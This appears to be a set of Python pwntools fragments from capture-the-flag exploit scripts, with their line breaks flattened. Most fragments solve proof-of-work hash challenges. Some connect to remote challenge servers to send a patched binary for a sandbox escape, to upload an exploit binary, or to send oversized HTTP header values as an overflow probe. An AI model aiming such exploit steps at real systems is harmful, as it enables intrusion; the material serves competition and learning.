def prof(r): chal = r.recvline()[:-1] x = bruteforce(lambda x: hash(chal + x).startswith('00000'), string.ascii_letters + string.digits, length=4, method='downfrom') r.send(x)
elf = f.read() libc = ELF("./libc.so.6") idx = elf.find(p64(0x227168 + 0x5cc000 - libc.sym["free"])) for offset in range(0x5cc000, 0x300000, -0x1000): print hex(offset) dis = offset + 0x227168 - libc.sym["free"] if len(sys.argv) == 2: r = remote("39.105.151.182", 9999) r.recvuntil("key+\"") key = r.recv(10) r.recvuntil("==") ret = r.recv(4) data = bruteforce(lambda x: md5(x + key)[:4] == ret, method="downfrom", length=5, alphabet=pool) r.sendline(data) else: r = remote("127.0.0.1", 1234) r.recvuntil("escape the sandbox!") payload = elf[:idx] + p64(dis) + elf[idx + 8:] try: r.sendline(base64.b64encode(payload)) r.recvuntil("[*] Switching to interactive mode\n") r.sendline("cat flag") data = r.recvline() print data if "EOF" in data or "stopped" in data: r.close() else:
def brute_force(prefix,s): return bruteforce(lambda x:sha256(x+prefix).hexdigest()==s,string.ascii_letters+string.digits,length=4)
def pow(prefix,data): def f(x): return sha256((prefix+x).decode("hex")).hexdigest() == data ans = bruteforce(f,pool,length = 3,method= 'fixed') return prefix + ans
import hashlib context.log_level = "debug" def hash(x): return hashlib.sha256(x).hexdigest() r = remote("111.186.63.13", 10001) r.recvuntil("XXXX+") prefix = r.recvuntil(")")[:-1] print prefix r.recvuntil("== ") result = r.recvline()[:-1] print result x = bruteforce(lambda x: hash(x + prefix) == result, string.ascii_letters + string.digits, length=4, method='downfrom') r.sendline(x) with open("./exp", "r") as f: exp = f.read() r.sendline(str(len(exp))) r.send(exp) r.interactive()
#heap_add=0 #stack_add=0 def proof_of_work(sol, chal): #chal = ''.join(random.choice(string.letters+string.digits) for _ in xrange(16)) return sha256(chal + sol).hexdigest().startswith('00000') if len(sys.argv) == 1: r = process(pwn_file) pid = r.pid else: r = remote("49.4.91.205", 31337) prefix = r.recvline()[:-1] r.sendline( bruteforce(lambda x: proof_of_work(x, prefix), string.letters + string.digits, method='fixed', length=4)) pid = 0 def debug(): log.debug("process pid:%d" % pid) #log.debug("stack add:0x%x"%stack_add) #log.debug("heap add:0x%x"%heap_add) #log.debug("libc add:0x%x"%libc.address) pause() r.sendline("get /%s 123" % ("a" * 9999)) r.sendline("HOST: %s" % ("a" * 0x100)) r.sendline("Authorization: %s" % ("a" * 0x100))
def solve(prefix): return bruteforce( lambda x: sha256(prefix + x).digest().startswith("\x00\x00\x00"), string.letters + string.digits, length=4)